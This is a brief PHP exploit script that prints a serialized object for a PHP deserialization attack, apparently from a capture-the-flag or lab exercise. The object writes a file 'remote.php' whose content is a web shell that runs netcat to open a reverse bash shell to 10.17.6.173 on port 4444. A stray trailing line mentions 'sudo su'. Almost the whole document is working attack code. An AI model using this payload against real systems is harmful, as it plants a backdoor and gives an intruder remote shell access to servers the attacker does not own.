<?php
class file
{
public $file = 'remote.php';
public $data = '<?php shell_exec("nc -e /bin/bash 10.17.6.173 4444"); ?>';
}

echo (serialize(new file));

?>

逆天sudo su